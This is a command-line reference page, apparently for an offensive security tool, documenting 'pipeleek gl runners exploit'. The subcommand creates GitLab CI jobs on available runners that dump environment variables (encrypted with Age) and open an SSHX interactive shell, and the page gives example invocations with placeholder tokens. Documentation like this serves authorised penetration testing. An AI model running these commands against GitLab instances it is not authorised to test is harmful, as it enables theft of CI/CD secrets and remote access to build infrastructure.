Exploit
pipeleek gl runners exploit
Create project with CI/CD jobs to exploit available runners
Synopsis
Creates a project, generates a job per available runner tag and runs a default .gitlab-Ci.yml definition which can be customized for exploitation.
| pipeleek gl runners exploit [flags]
|
Examples
| # Creates a project with jobs for all available runners with the tags docker, shared. Dumps the envs encrypted using Age and starts an interactive SSHX shell,
pipeleek gl runners exploit --token glpat-xxxxxxxxxxx --gitlab https://gitlab.mydomain.com --tags docker,shared --age-public-key age1... --repo-name my-exploit-repo --dry=false --shell=true
# Print the generated .gitlab-ci.yml only, does NOT create a project or jobs
pipeleek gl runners exploit --token glpat-xxxxxxxxxxx --gitlab https://gitlab.mydomain.com --dry=true --shell=true
|
Options
| --age-public-key string An age public key generated with ./age-keygen -o key.txt (repo: https://github.com/FiloSottile/age). Prints the encrypted environment variables in the output log.
-d, --dry Only generate and print the .gitlab-ci.yml, do NOT create real jobs
-h, --help help for exploit
--repo-name string The name for the created repository (default "pipeleek-runner-test")
-s, --shell Add an SSHX interactive shell to the jobs (default true)
--tags strings Jobs with the following tags are created
|
Options inherited from parent commands
| --color Enable colored log output (auto-disabled when using --logfile) (default true)
-g, --gitlab string GitLab instance URL
--ignore-proxy Ignore HTTP_PROXY environment variable
--json Use JSON as log output format
--log-level string Set log level globally (debug, info, warn, error). Example: --log-level=warn
-l, --logfile string Log output to a file
-t, --token string GitLab API Token
-v, --verbose Enable debug logging (shortcut for --log-level=debug)
|
SEE ALSO